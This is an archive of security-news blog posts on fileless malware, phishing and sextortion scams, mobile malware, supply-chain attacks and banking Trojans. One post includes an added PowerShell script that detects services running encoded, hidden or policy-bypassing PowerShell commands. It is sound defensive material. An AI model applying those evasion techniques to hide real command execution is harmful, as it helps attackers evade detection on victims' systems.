Category Archives: threat detection

How to Defend Your Organization Against Fileless Malware Attacks

The threat of fileless malware and its potential to harm enterprises is growing.

Fileless malware leverages what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that have actionable data, the .NET framework, etc. Malware doesn’t have to drop a file to use these programs for bad intentions.

The combination of all of these code sources is generally called process hollowing — a tactic in which malware uses a particular process as a storage container and distribution mechanism for its code. One recent attack discovered by FireEye combined PowerShell, VB scripts and .NET in a single lethal package.

Attacks leveraging PowerShell are particularly on the rise. Last fall, IBM X-Force Incident Response and Intelligence Services (IRIS) demonstrated just how potent PowerShell-based exploits can be, since code is executed directly from a PC’s memory. Plus, PowerShell can be used for remote access attacks and get around application whitelisting protections.

Given this growing threat, what can security teams do to help defend their organizations against fileless malware?

Ensure Strong Companywide Security Hygiene

The general thrust of how to combat fileless malware begins with making sure your Windows computers are patched and up to date. Since one of the first tenets of threat actors is taking advantage of unpatched, older systems, to delay patch management is to introduce a vulnerability into your network. The spread of EternalBlue illustrated this well; the patch was available for more than a month before the exploit was launched.

The next step is to ensure you have a solid security awareness training regimen. This doesn’t mean running annual exercises or sending out the occasional test phishing email. Instead, come up with a program that operates continuously and is always making users aware of the dangers of email attachments and clicking on links willy-nilly. Most fileless campaigns begin their life with a simple phishing email, so it is important to try to nip these entry points quickly.

Third is to understand the behavior of built-in Windows code so you can spot anomalies, such as when encrypted PowerShell scripts are installed to run as a service. The combination of the two — the encryption and the service feature — should be a red flag. Analysts sometimes see compression tools instead of or in addition to encryption as well. Another red flag is finding a PowerShell script hiding in the \TEMP directory; while not technically fileless, this code quickly moves to more dangerous parts of the operating system (OS).

Understand Your Access Rights and Privileges

Organizations should understand what happens when fileless malware first detonates. Just because you have a user who clicked on a malicious attachment doesn’t mean the malware will stay on their PC. Instead, a typical behavior is for the malware to move across your network to find a richer target, such as a domain controller or web server. To prevent this, you should segment your network carefully and make sure you understand access rights, especially for third-party applications and users.

A common attack method is escalating privileges as malware moves around the network, which can be done using PowerShell, for example. They don’t call it PowerShell for nothing: An actor can issue commands for reverse Domain Name System (DNS) queries, enumerate access control lists on any network share and find members of a particular domain group. This means one of the more basic controls for any malware is to restrict administrator rights to the minimum number of systems.

Many fileless exploits count on the profligate use of rights that aren’t needed or are attached to users that have since left the company, or outdated rights for users who don’t access the targeted applications anymore. Companies should develop methods to detect when these situations occur and be able to shut them down quickly. Organizations should also disable Windows programs that aren’t needed. Not everyone needs PowerShell running on their computer, or support for the .NET framework. Even more effective is to eliminate support for ancient protocols such as SMBv1, which was what caused all the trouble with WannaCry.
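The two red flags called out above (an encoded PowerShell command installed as a service, with compression or nested encoding inside it, and SMBv1 still enabled) can be checked on a host with a short audit script. This is an added example, not code from the original article; it assumes an elevated Windows PowerShell 5.1+ session and the SmbShare module (Windows 8/Server 2012 or later), and the function names are my own.

```powershell
# Added example (not from the original article). Audits a Windows host for two
# of the red flags described above: services whose image path launches an
# encoded PowerShell command, and the SMBv1 server protocol still being enabled.
# Assumes an elevated Windows PowerShell 5.1+ session and the SmbShare module.

function Get-SuspiciousPowerShellService {
    # Returns one object per service that starts powershell.exe / pwsh.exe with
    # suspicious arguments. The Base64 payload of -EncodedCommand is decoded so
    # an analyst can read what the service would actually run at start-up.
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -match 'powershell|pwsh' } |
        ForEach-Object {
            $svc     = $_
            $path    = $svc.PathName
            $flags   = @()
            $decoded = $null

            # -e, -ec, -enc and -EncodedCommand all take a UTF-16LE Base64 blob.
            if ($path -match '-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})') {
                $flags += 'EncodedCommand'
                try {
                    $bytes   = [Convert]::FromBase64String($Matches[2])
                    $decoded = [Text.Encoding]::Unicode.GetString($bytes)
                } catch {
                    $decoded = '<argument is not valid Base64>'
                }
                # A second layer of encoding or a compression stream inside the
                # payload is the "compression in addition to encoding" pattern.
                if ($decoded -match 'FromBase64String|GzipStream|DeflateStream|IO\.Compression') {
                    $flags += 'NestedEncodingOrCompression'
                }
            }
            if ($path -match '-w\w*\s+hidden')            { $flags += 'HiddenWindow' }
            if ($path -match '-e(p|x\w*)\s+bypass')       { $flags += 'ExecutionPolicyBypass' }
            if ($path -match '-nop(rofile)?\b')           { $flags += 'NoProfile' }
            if ($path -match '\\Temp\\[^"]*\.ps1')        { $flags += 'ScriptInTemp' }

            if ($flags.Count -gt 0) {
                [PSCustomObject]@{
                    Name           = $svc.Name
                    StartMode      = $svc.StartMode
                    State          = $svc.State
                    PathName       = $path
                    Flags          = ($flags -join ',')
                    DecodedCommand = $decoded
                }
            }
        }
}

function Test-Smb1Enabled {
    # $true when the SMBv1 server protocol is still enabled on this host,
    # $null when Get-SmbServerConfiguration is not available.
    try {
        return [bool](Get-SmbServerConfiguration -ErrorAction Stop).EnableSMB1Protocol
    } catch {
        return $null
    }
}

# Run the audit and print a summary.
$findings = Get-SuspiciousPowerShellService
if ($findings) { $findings | Format-List } else { 'No suspicious PowerShell-based services found.' }

if (Test-Smb1Enabled -eq $true) {
    'WARNING: SMBv1 is enabled. Disable it with: Set-SmbServerConfiguration -EnableSMB1Protocol $false'
}
```

Services that legitimately wrap a signed management script will also show up with a NoProfile or HiddenWindow flag; the EncodedCommand and NestedEncodingOrCompression flags together, on an auto-start service, are the combination the text describes as a red flag.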

Finally, while PowerShell can get around application whitelisting, it is still a good idea to deploy such controls. The more you know about how your users consume applications, the more likely you will be able to catch a piece of malware doing something that no other legit app has been observed doing. Another way is to disable macros, including Office macros, which are often abused by malware writers, although this isn’t a universal solution because many users do need them to do their jobs.

As a side note, Windows can be used for more than just desktop computers, and threat actors will sometimes target embedded Windows point-of-sale (POS) machines. The attraction here is that these computers have direct access to payment card data, so having extra protection for this population is crucial.

Combat Fileless Malware Threats With Careful Coordination

Microsoft hasn’t been standing still while fileless attacks run rampant. In fact, the company has developed an open interface called Antimalware Scan Interface that some vendors have begun using to make it easier to detect the “tells” of the fileless world, especially when it comes to analyzing scripting behavior.

In addition, anyone who wants to gain a better understanding of fileless attacks should check out the open source project AltFS. This is a complete fileless virtual file system to demonstrate how these techniques work, and it can be deployed on Windows and Mac PCs.

As you can see, fighting fileless malware attacks will take some serious effort and careful coordination among a variety of tools and techniques. With more unpredictable malware threats on the horizon, organizations should take steps today to strengthen their defenses.

The post How to Defend Your Organization Against Fileless Malware Attacks appeared first on Security Intelligence.

The State of Security: Managed Vulnerability Management? Yes, You Read That Right

The importance of a mature vulnerability management program can’t be overstated. File integrity monitoring (FIM) and security configuration management (SCM) might be the bedrock of a strong cybersecurity program, but they can only go so far. Scanning for vulnerabilities needs to be a foundational part of your program, too. The Center for Internet Security (CIS) […]

The post Managed Vulnerability Management? Yes, You Read That Right appeared first on The State of Security.


Sextortion Scammers Enhance Attack Campaigns With Image Spam, Other New Techniques

Security researchers observed sextortion scammers launching new attack campaigns that leverage image spam and other clever techniques to trick users into fulfilling their demands.

According to Cisco Talos, attackers are currently using several different tactics to make their emails evade detection by anti-spam filters. Some of these methods aren’t entirely new. For instance, some attackers are using image spam, a technique that goes back to at least 2005, by sending along only an image of a sextortion-based ransom note.

The problem with this approach, however, is that victims can’t follow the note’s instructions or copy the attacker-owned bitcoin address included in the image. This snag lowers the chances of the attackers receiving payment.

Some of the tactics are more recent. For instance, some threat actors are seeking to trick anti-spam filters by using a combination of usernames in comments, plaintext letters and HTML characters. Others are sending along ZIP files that purport to contain evidence of the attackers having compromised the target’s computer.

Cisco Talos researchers weren’t able to examine the contents of these password-protected archives, but they believe that any files included likely consist of junk data.

New Attack Waves, New Techniques

Sextortion scammers have been busy since at least July 2018, when researchers discovered the first attack waves. As reported by Krebs on Security, those emails leveraged passwords already compromised in publicly disclosed data breaches to trick users into fulfilling the attacker’s demands. One month later, Naked Security spotted another wave using redacted phone numbers toward the same end.

Since then, cybercriminals have grown increasingly more creative. For instance, Proofpoint observed one wave that attempted to infect users’ computers with GandCrab ransomware. Another variant relied on a fake CIA investigation to scare users into paying, as reported by Tripwire.

How to Defend Against Sextortion Scams

Security professionals can help defend their organizations against sextortion scams by using ahead-of-threat detection to spot potentially malicious domains before threat actors have the chance to use them against employees.

As always, organizations should also create an ongoing security awareness training program that teaches users to be on the lookout for social media scams and other ruses such as sextortion-based ploys.

The post Sextortion Scammers Enhance Attack Campaigns With Image Spam, Other New Techniques appeared first on Security Intelligence.

Phishing Campaign Makes Use of SingleFile Browser Extension Tool to Obfuscate Malicious Activity

In a recent phishing campaign, fraudsters used a legitimate browser extension tool called SingleFile to obfuscate their attacks and remain undetected.

According to Trend Micro, the malicious mail campaign started on Feb. 27 and utilized SingleFile, a web extension for Google Chrome and Mozilla Firefox that allows users to save webpages as single HTML files. As such, SingleFile is designed to help streamline the process by which users can archive webpages.

Threat actors abused SingleFile’s legitimate functionality, however, by copying the login pages of legitimate websites, such as those of the payment processing website Stripe. Though simple, this spoofing method enabled the attackers to generate an almost identical copy of the legitimate website’s login mechanism, which they could then use to phish for users’ credentials. This attack technique came with an added bonus in that it hid the login form’s HTML code, as well as the JavaScript used by the legitimate login page, from detection by static security tools.

Attackers’ Growing Abuse of Legitimate Tools

As noted by Symantec, threat actors are increasingly living off the land in that they’re using tools already installed on a computer and running simple scripts or shellcode directly into memory as part of their campaigns. As with the use of SingleFile identified above, these tactics help attackers evade detection.

Fraudsters are also now obtaining digital certificates to add a sense of legitimacy to their phishing pages. According to Krebs on Security, just under half (49 percent) of phishing sites now come with the green padlock in the address bar, an icon that is indicative of a secure web connection.

How to Defend Against SingleFile Phishing Campaigns

Security professionals can help defend their organizations against a phishing campaign by using ahead-of-threat detection to filter out potentially malicious domains based on WHOIS information and other intelligence feeds. Security teams should also develop an ongoing security awareness program and customize training to the unique needs of the organization.

The post Phishing Campaign Makes Use of SingleFile Browser Extension Tool to Obfuscate Malicious Activity appeared first on Security Intelligence.

Fraudsters Seize on March Madness Fervor With Phishing Attacks, Streaming Scams

Online fraudsters are exploiting users’ excitement for March Madness by targeting them with phishing attacks and streaming scams.

Zscaler researchers came across multiple phishing websites after searching Google for free livestreams of “March Madness,” the colloquial name for the annual NCAA Division I Men’s Basketball Tournament. One such site, streamcartel[.]org, contained adware on each of its pages. Whenever a user clicked anywhere on the page or attempted to close one of the malicious ads, a new tab opened and prompted the user to install a fake browser extension.

The security firm also found malicious activity on sawlive[.]tv. This phishing site used sporting events to attract users into visiting and then bombarded them with malicious ads. One such ad redirected users to a fake Windows security warning page.

Zscaler’s research also turned up several typosquatting domains that used terms associated with the NCAA Tournament to prey upon unsuspecting users. With thousands of people rushing to watch the games online, it’s easy to imagine some fans clicking on malicious links without thinking twice.

Streaming Scams Are Common in March

Given the relatively high success rate of social engineering campaigns, March Madness-themed cyberattacks are unsurprisingly common this time of year.

In March 2017, for example, Zscaler detected attackers using phishing sites that used the popularity of March Madness to target employees with adware. These malicious ads, in turn, tricked users into installing browser hijackers and other potentially unwanted applications. And in 2018, WXYZ reported that Michigan Attorney General Bill Schuette had issued an alert warning users to be on the lookout for scammers pushing fake March Madness tickets.

How to Stop the Madness of Topical Phishing Attacks

Threat actors have a history of creating phishing attacks around topical events such as March Madness. Acknowledging that reality, security professionals should help defend their organizations with ahead-of-threat detection to detect potentially malicious domains before the threats themselves become visible.

Additionally, companies should create a security awareness training program that, among other things, teaches employees about some of the most common types of social media scams and social engineering tactics.

The post Fraudsters Seize on March Madness Fervor With Phishing Attacks, Streaming Scams appeared first on Security Intelligence.

Preparing for the Unpredictable: Security in a New World of Mobile Malware

Mobile malware is nothing new. But in recent months, attackers have been getting more creative and resourceful with how they conceal, distribute and deploy these threats.

This newfound creativity is part of a mobile threat trend that can be summarized as follows: Attacks are on the rise, they’re focusing on mobile devices and they’re getting far more aggressive with their methods.

Mobile Threats by the Numbers

The numbers are staggering. Kaspersky Lab’s “Mobile Malware Evolution 2018” report found that the number of devices attacked by malware increased from 66.4 million in 2017 to 116.5 million in 2018 — and we should assume another big rise for 2019. The researchers also found that the “quality” of malware — its precision and impact — is on the rise. The number of so-called “Trojan-droppers” — malware that gets past security to deliver its payload — doubled from 2017 to 2018, according to the report.

In its most recent “Mobile Threat Report,” McAfee detailed how mobile phones are being increasingly targeted with mobile app backdoors, banking Trojans and cryptomining malware. One alarming trend is the number of fake apps appearing in dozens of app stores, rising from around 10,000 fake apps in the middle of 2018 to approximately 65,000 by the end of the year.

In addition, Verizon’s most recent “Mobile Security Index 2019” found that a majority of those surveyed believed their organization is at risk of mobile threats. One-third of companies reported suffering a compromise that involved mobile devices. Despite this, more than half said they had sacrificed security to “get the job done.” An incredible 81 percent of respondents said they had personally used insecure public WiFi for work, despite knowing that the practice is both unsafe and prohibited by company policy.

All this is to say that the threat from mobile devices is increasing at an extremely high rate, yet most organizations are woefully unready.

A New World of Mobile Malware

All that data around the rising threat of mobile-based attacks doesn’t fully address the quality of the latest malware. Just look at the creative thinking behind a recent incarnation of malware called Anubis.

Anubis’ Motion-Based Evasion Tactics

Distributed inside at least two apps available on the Google Play store, Anubis banking malware concealed itself using the target phones’ motion sensors. Researchers often use emulators to hunt for Trojans in apps — or they search on real phones, which are often mounted and motionless. The Anubis creators figured out that one difference between security researchers and real-life users is motion. By activating only after motion was detected, the malware could remain invisible to many researchers but still activate on phones in the wild.

Trend Micro reported in January that the motion-activated Anubis appeared in two seemingly legitimate apps: a battery extender app with a 4.5-star rating and a currency converter. Once activated, Anubis installed a keylogger for stealing credentials or took screenshots for the same purpose.

Preinstalled Mobile Malware

Downloading apps is one way to sneak malware onto phones. Preinstalling it is another. The technology firm Upstream discovered in January that the Alcatel smartphone models Pixi 4 and A3 Max contained malware out of the box. The malware was hidden in a preinstalled weather app called Weather Forecast-World Weather Accurate Radar. The app was also available separately on the Google Play store and was downloaded more than 10 million times. It has since been removed.

The malware collected various bits of data, such as location data, user email addresses and International Mobile Equipment Identity (IMEI) numbers and may have loaded adware. It also subscribed users to a for-pay phone number service.

Clipper Malware on Google Play

Another unwelcome trend is the appearance of older methods of compromise in legitimate app stores. For example, the first clipper malware ever discovered on the official Google Play store was found by the security company ESET in February: Android/Clipper.C. Previously, clipper malware was the exclusive province of desktop PCs or unauthorized app stores.

Clipper apps replace the clipboard contents of a device with other data. For example, a clipper app might switch the account for a deposit during a cryptocurrency transaction, redirecting the transaction to the attacker’s account.

In addition, Android/Clipper.C attempted to nab credentials and private keys and send them to the attacker’s Telegram account to steal Ethereum funds, but it could also replace either an Ethereum or a bitcoin wallet address.

Attack Campaigns on a Massive Scale

Yet another new trend is that some malware is being distributed on a massive scale. Some 150 million Android users were impacted recently by malware called SimBad. The malware disguises itself as advertising, according to Check Point, mostly inside a large number of mobile games.

In fact, SimBad carries out phishing attacks that lead users to websites where even more malware is downloaded. Once launched, SimBad is difficult to stop or uninstall. Apps containing the SimBad malware have since been removed from the store.

Distributing Malware via Image Files

Malware can even be smuggled onto a phone without apps. A new Android bug enabled a standard photo file format to serve as the vehicle for an attack. Google discovered the method, fixed it with a February patch, then described it in a security bulletin. The flaw enabled hacks of Android smartphones via PNG files, by way of a purpose-built PNG file that could execute code. It’s worth noting that the vast majority of Android phones are not updated frequently and did not get the patch quickly.

What Can We Do to Combat Creative New Malware Strains?

The bottom line is that mobile malware techniques to compromise security cannot be easily predicted. What can be predicted is that threats will continue to rise, new methods will continue to be devised and mobile devices will continue to be the focus of intense malware activity.

The point of all this is not to guard specifically against the examples in this article, but to understand the growing threat — and reflect on the fact that far too many organizations are unprepared. So what can they do to prepare for the unpredictable?

To get started, here are some mobile security best practices and policies to follow and enforce:

  • Keep devices current with the latest updates.

  • Stick to official and authorized app stores. While many of the threats reported here actually appeared on the official Google Play store, it’s important to note that affected apps are removed immediately once discovered. The same can’t be said for unauthorized sources for mobile apps.

  • Minimize the number of apps installed and favor reputable app developers.

  • Embrace a comprehensive approach to mobile security that can protect against even unreported or unpredicted threats.

  • Understand that some of the newest threats can only be stopped with powerful artificial intelligence-based tools.

  • Improve and enforce policies against using public WiFi and in favor of using good password management.

Nobody can predict how creative new malware methods will infiltrate the mobile devices used by employees at your organization. But it’s easy to predict that these attempts will be made. Security decision-makers can no longer think about these threats as theoretical or secondary in importance to other work. It’s time to act on what we know is coming: something unpredictable.

The post Preparing for the Unpredictable: Security in a New World of Mobile Malware appeared first on Security Intelligence.

As fraud attacks grow more sophisticated, a need for contextual detection strategies increases

Fraudsters are using a complex array of tools to build armies of fake accounts, 74% of all fraudulent accounts are created from desktops, and cloud service provider IP ranges are at a higher risk.

How fraudsters behave

Fraudsters rely heavily on cloud datacenter IP ranges and cloud services are becoming a favorite attack tool; whether to mask the true origin of fraudulent accounts or to easily orchestrate attacks at scale by exploiting virtual servers, according …

The post As fraud attacks grow more sophisticated, a need for contextual detection strategies increases appeared first on Help Net Security.

To Move Forward Securely, Look Backward With Ongoing Risk Assessments

As security professionals, we’re constantly on the lookout for the latest research and trends to stay on top of new threats. This is sensible in that novel attacks seem most likely to go undetected, but if we focus on the future at the expense of performing risk assessments to maintain defenses against existing threats, we will always be one step behind attackers.

It’s said that history doesn’t repeat itself, but it often rhymes. This is particularly true with cybercrime. As we’ve watched malware trends shift from one generation of technology to the next, it’s clear that old techniques are often reused.

Legacy Code, Current Security Problems

Technology moves quickly, and most organizations have a lot on their plates dealing with a constant influx of new apps and devices. Each new wave of changes brings a new codebase and a new attack surface. It’s reasonable to take these risks seriously, but in this constant race to address new threats, we can accrue security debt that opens us up to threats that have not been completely addressed in older technology.

While it’s well-known that updating software is a key part of keeping the organization secure, this is not always practical. Most companies have legacy technology that must be kept for one reason or another, often because it’s too expensive or difficult to replace. Millions of computers are still using antiquated software, much of which is known to be problematic. For example, according to Statcounter, Windows XP still has around 2 percent of the global desktop Windows version market share, and Windows 7 — which will no longer be supported after 2019 — still has around 34 percent.

Even code that’s current, has been in use for years and is considered safe can sometimes hide major problems. There are plenty of examples from recent years in which vulnerabilities were found in code that was in active use for years or even decades, such as Heartbleed, Shellshock, Meltdown and Spectre.

From a return on investment (ROI) perspective, it makes sense for criminals to spend as little time and effort as possible creating new attacks when existing problems can easily be exploited. Old malware and vulnerabilities linger on a surprising number of systems.

Old Attack Types Resurface

Threat actors aren’t just recycling old vulnerabilities and malware; they are also fond of reusing old attack vectors, particularly those that have been off the industry’s radar for so long that we forget they’re a problem.

For example, boot sector viruses and macro viruses were once considered all but dead, as heuristic detection became so effective that even brand new malware was usually identified as soon as it was released. But once attackers rediscovered these techniques, a new generation of malware researchers had to resurrect skills from the past to reverse engineer these threats. As Krebs on Security reported last year, even malware sent by snail mail has made a bizarre reappearance.

The Pattern Repeats in New Devices

Sometimes old attacks are ported to new operating systems and devices, which are perceived as less threat-prone than more traditional computers. Malware authors have had years of practice porting Windows threats to other operating systems, and attacks have been carried out on everything from mobile phones to internet-connected refrigerators.

Researchers have been predicting internet of things (IoT) security issues for almost 20 years, due in large part to device manufacturers failing to learn the lessons of the past. Yet many “smart” devices fail to follow basic IoT security best practices, including using default login credentials and failing to include software update capabilities.

Start Addressing Security Debt With Ongoing Risk Assessments

The good news is that many of the techniques that help with addressing security debt will also help mitigate the problems that could come with new threats. Perhaps the best strategy is to conduct thorough and ongoing risk assessments to identify which assets and vulnerabilities are present in your environment. You can then move on to mitigating the biggest risks for different kinds of devices and code.

For Old Code or Devices

Identify and update what you’re able to. For things that you’re unable to update, it’s best to harden the machines as much as possible and monitor them closely. This hardening may include segregating these devices from the rest of your network, limiting the privileges of the device and/or using application whitelists.

For Newer IoT Devices

If at all possible, purchase devices that were built with security in mind. This should include, at a minimum, the ability to change usernames and passwords as well as software update mechanisms. Ask vendors to practice security by design principles as outlined by the Open Web Application Security Project (OWASP). You can also put risky devices on segregated portions of your network while monitoring traffic in and out of these areas.

For Everything Else

New devices with updated software can still fall victim to old attack techniques. It’s important to make sure you’re covering the basics, such as practicing good password hygiene and using a reputable security suite. But there are other protection steps you should also be taking.

For instance, use layers of defense wherever possible, such as multifactor authentication to protect login credentials rather than just a username and password. Set security policies and procedures and make sure your users are briefed on them early and often. Tailor your practices so that the people in your environment are able to do what they need to without undue trouble, but also without allowing more privileges than are truly necessary.

Invest Wisely to Combat Both Old and New Threats

Protecting a network can be a costly and difficult endeavor if you apply tools blindly in fear of future problems. Spend your security investments more wisely by regularly and thoroughly assessing which assets you have to protect and mitigate any risks to those assets — whether they’re old or new vulnerabilities. You don’t need to have the most newfangled technology to make your environments an unattractive target for cybercriminals.

The post To Move Forward Securely, Look Backward With Ongoing Risk Assessments appeared first on Security Intelligence.

15% of enterprises have experienced a targeted attack

Kaspersky Lab’s paper helped shed light on ways to identify the attacker and make well-informed, strategic decisions about threat detection. The cyber security market in India is growing exponentially, and is

The post 15% of enterprises have experienced a targeted attack appeared first on The Cyber Security Place.

Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches

The first quarter of every year produces dozens of reports that both reflect on the threats of the previous year and look ahead to understand how to avoid future security breaches. No single report can offer a foolproof approach to data protection, but the findings in the Identity Theft Resource Center (ITRC)’s “2018 End-of-Year Data Breach Report” serve as a stark reminder of why companies should take a layered approach to security.

A notable and somewhat confounding takeaway from the report was that, despite fewer reported data breaches compared to the previous year, 2018 saw a 126 percent uptick in the number of records breached containing personally identifiable information (PII). In many cases, these breaches were the result of the continued use and reuse of passwords and usernames, as well as vulnerabilities caused by third-party vendors.

How can industry leaders turn last year’s surge in stolen records into a record-breaking year of cybersecurity success?

The Perfect Cyber Threat Storm

Unfortunately, a lack of resources in budget and skilled staff remain the top reasons why many organizations lag in their overall security postures. All the while, though, today’s cybercriminals are increasingly monetizing their activities in various creative ways.

Additionally, the report found that consumers are continuing to choose convenience over security, believing that it is the business’ responsibility to protect the data it collects. That’s why only safeguarding networks is not enough, according to Byron Rashed, vice president of marketing at Centripetal Networks.

“It’s a combination of layered security best practice and user cybersecurity education that will greatly mitigate risk,” said Rashed. “From phishing to ransomware, the attackers’ schemes have become more complex and, in many circumstances, extremely damaging. Add into the equation human error and you now have the perfect cyber threat storm.”

A Familiar Weather Pattern of Data Breaches

What some might see as the brewing of a perfect threat storm, others recognize as a familiar threat. Here, the old adage that hindsight is 20/20 rings true, and it gives defenders a slight advantage. Armed with the insight of what went wrong last year, security professionals can be more proactive in building defense in depth. The enormous jump in the number of exposed sensitive records indicates that organizations should strengthen their data privacy efforts. Looking at a breakdown of the types of compromises from the ITRC report, 39 percent of breaches resulted from hacking and 30 percent resulted from unauthorized access.

Understanding attack methods will inform mitigation, but it’s also important to push through fear, uncertainty and doubt to see that things may not be as bleak as they appear. After all, the report did find that the actual number of data breaches fell by 23 percent from 2017. The business industry, which had the largest number of breaches, also had the fewest records exposed.

“Yes, hackers continue to succeed at stealing more records, but really, how many times can they steal the same Social Security number?” said John Gunn, chief marketing officer at OneSpan. “More importantly, the methods for verifying the identity for someone conducting a remote digital transaction have experienced huge gains in the past year with biometric and behavioral techniques enhanced by artificial intelligence (AI).”

While threat actors may be getting more data, banks and merchants are getting better at stopping the fraud these cybercriminals would otherwise commit with that compromised data, according to Gunn. By sharing massive amounts of information, financial institutions can leverage AI, machine learning-based analyses and anti-fraud platforms to enable the detection of new malware threats and previously hidden attacks in real time.

Build a Foundation of Proactive Cybersecurity Measures

There is arguably no way to say that any particular security strategy can completely prevent a cyberattack, but there are many ways companies can prepare for threats so they are better able to detect and respond to cyberattacks when they do happen.

“Organizations need to build a foundation of proactive measures, such as frequent employee training, preventative security controls and staying up to date with industry best practices,” said Andy Wright, regional director, Northern Europe for Check Point.

Because innovation is moving so swiftly, keeping abreast of industry best practices can seem like a full-time job on its own. Added to that is the reality that attackers are constantly evolving their campaigns, often exploiting zero-day vulnerabilities with attacks that have no known signature — meaning they evade the detection of most antivirus tools.

Making everyone within the organization aware of security risks to the company will help create a security-aware culture in which end users are encouraged to report security issues without the fear of negative consequences. “Reporting a human error early on can help identify and prevent intrusions, which will stop the attack earlier in the kill chain,” said Chad Cragle, information security officer at FormAssembly. If employees feel that their jobs are not at risk for reporting human errors, they are more inclined to share useful information with the security team.

Part of training employees includes education about spear phishing and common malware exploits so that workers are familiar with and better able to identify these threats — and also less likely to fall victim to newer, emerging threats. When employees know what to look for, they are more risk-aware and more likely to report errors early on.

In addition, implementing password updates and two-factor or multifactor authentication will help mitigate the risk of unauthorized access to systems and resources.

“This can be supported by using encrypted PCs and devices. These measures should also be extended to third-party vendors to ensure they’ve enabled the proper security protocols that prevent hackers from accessing their network and jumping across,” Wright said.

Fight the Storm With a Layered Approach to Security

Organizations can build defense in depth through a layered approach to security, which includes intrusion prevention and threat detection and response tools, encryption, access controls, and data loss prevention tools. Because security is not only about technology, it’s also important to think about defense as it relates to people and processes. Another critical piece of preventing and blocking threats is having clear policies that are tested and consistently updated, particularly when it comes to risk management and software updates.

If your security program has all these aspects, you’re well on your way to helping make 2019 a record-breaking year of cybersecurity success.

The post Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches appeared first on Security Intelligence.

Operation ShadowHammer Supply Chain Attack May Have Distributed Backdoor to 1 Million-Plus Users

Security researchers believe a supply chain attack known as Operation ShadowHammer may have distributed a backdoor to more than 1 million users.

Kaspersky Lab first discovered Operation ShadowHammer back in January 2019. The attackers behind the campaign directed their supply chain attack against the ASUS Live Update software, a utility that comes preinstalled on most computers built by ASUS. The software automatically receives updates for certain components, such as the Basic Input/Output System (BIOS), Unified Extensible Firmware Interface (UEFI) and other applications.

Kaspersky Lab observed 57,000 users of its security products who had installed the backdoor on their machines. The security firm can’t calculate the total number of users affected by the attack from just its own data, but it estimated that the campaign could have affected at least 1 million users. Even so, Kaspersky Lab found in its analysis that the likely goal of Operation ShadowHammer was to target an unknown pool of users via their network adapters’ media access control (MAC) addresses.

The Dangers of a Supply Chain Attack

Operation ShadowHammer isn’t the only sophisticated supply chain attack that’s emerged in the past few years. In September 2017, researchers at Morphisec reported that threat actors had succeeded in covertly modifying the Avast-owned security application CCleaner with a backdoor. This attack subsequently linked as many as 2.27 million users to a server under the attackers’ control.

A few months prior, wiper malware known as Nyetya/NotPetya affected many organizations and multinational corporations operating in Ukraine. Researchers at Cisco Talos launched an investigation into some of the key aspects of this outbreak and discovered that malefactors had conducted a supply chain attack against MeDoc, the makers of a Ukrainian accounting software package, to produce a malicious update disguised as ransomware and serve this payload to the software’s users.

Blocking Attacks Like Operation ShadowHammer

Security professionals can help defend against campaigns similar to Operation ShadowHammer by continuously monitoring their third-party connections. In doing so, security personnel should use firewall rules and other common methods to stay on the lookout for inbound connections.

Organizations should also invest in an artificial intelligence-based detection solution that can analyze networks for suspicious behaviors that a human eye might miss and protect the organization against sneaky digital threats like zero-day malware.

The post Operation ShadowHammer Supply Chain Attack May Have Distributed Backdoor to 1 Million-Plus Users appeared first on Security Intelligence.

TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks

Security researchers warned that the cybercriminals behind the two banking Trojans are now collaborating to perform man-in-the-middle (MitM) attacks.

On March 17, CrowdStrike discovered a BokBot proxy module called shadDll in conjunction with TrickBot. The code for the two banking Trojans is 81 percent similar, the researchers said, which means the proxy module can be seamlessly integrated into TrickBot’s extensible, modular framework. It’s possible the two threat groups have been collaborating on an ongoing basis, the researchers added.

Adding New Features Through Threat Group Collaboration

After infecting a machine by duping victims into installing malware via phishing messages, TrickBot can use the shadDll module to access networking functions and install illegitimate Secure Sockets Layer (SSL) certificates. At this point, it can do many of the things BokBot can do, including intercepting web traffic and redirecting it, taking screenshots to steal personal information, and injecting other malicious code.

The researchers have attributed the BokBot Trojan to a cybercriminal group called Lunar Spider, while TrickBot is believed to have been created by a group called Wizard Spider. TrickBot, which first emerged in late 2016, has proven highly versatile in attacking financial services firms, and Wizard Spider may include members of the group that developed the earlier Dyre malware, according to CrowdStrike.

How to Stay Ahead of TrickBot’s Tricks

The “IBM X-Force Threat Intelligence Index” for 2019 identified TrickBot as the most prevalent financial malware family of last year, representing 13 percent of all campaign activity. This was in part due to the ability of various threat actors to make use of the Trojan’s variants. For example, the report showed that IcedID distributed TrickBot within its own botnet in a 2018 campaign. However, experts noted that proper security controls, regular user education and planned incident response can help keep this threat at bay.

X-Force researchers also discovered that TrickBot has been used to steal cryptocurrency, and distribution of the BokBot module may make it even more popular. Organizations should employ advanced malware protection to receive alerts for high-risk devices and notifications when malware has been detected to ensure this cooperation among cybercriminals doesn’t lead to even deadlier attacks.

The post TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks appeared first on Security Intelligence.

What worries you the most when responding to a cybersecurity incident?

The clock starts ticking immediately following a cybersecurity incident, with the first 24 hours vital in terms of incident response. The majority (59 percent) of companies are not confident they could resume ‘business as usual’ after the first 24 hours, although 41 percent say they are, according to a new social media poll by NTT Security. Asked about their number one focus in the first 24 hours after a security incident, nearly two-thirds (64 percent) …

The post What worries you the most when responding to a cybersecurity incident? appeared first on Help Net Security.

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

